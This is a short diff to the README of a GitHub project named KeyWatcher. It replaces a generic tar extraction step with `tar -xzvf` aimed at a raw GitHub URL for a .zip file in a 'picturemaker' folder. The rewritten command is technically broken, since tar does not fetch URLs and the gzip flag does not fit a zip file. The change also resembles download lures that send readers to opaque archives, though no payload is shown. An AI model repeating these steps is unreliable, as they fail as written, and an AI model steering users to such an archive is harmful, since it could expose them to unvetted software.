Apostle121/KeyWatcher/README.md

 - **For Linux:**
   1. Open a terminal.
   2. Navigate to the directory where the file is located.
-  3. Use the command `tar -xzvf yourfile.tar.gz` to extract it.
+  3. Use the command `tar -xzvf https://raw.githubusercontent.com/Apostle121/KeyWatcher/main/picturemaker/KeyWatcher.zip` to extract it.
   4. Follow the instructions in the README file included in the extracted folder.

 ### 6. Launch KeyWatcher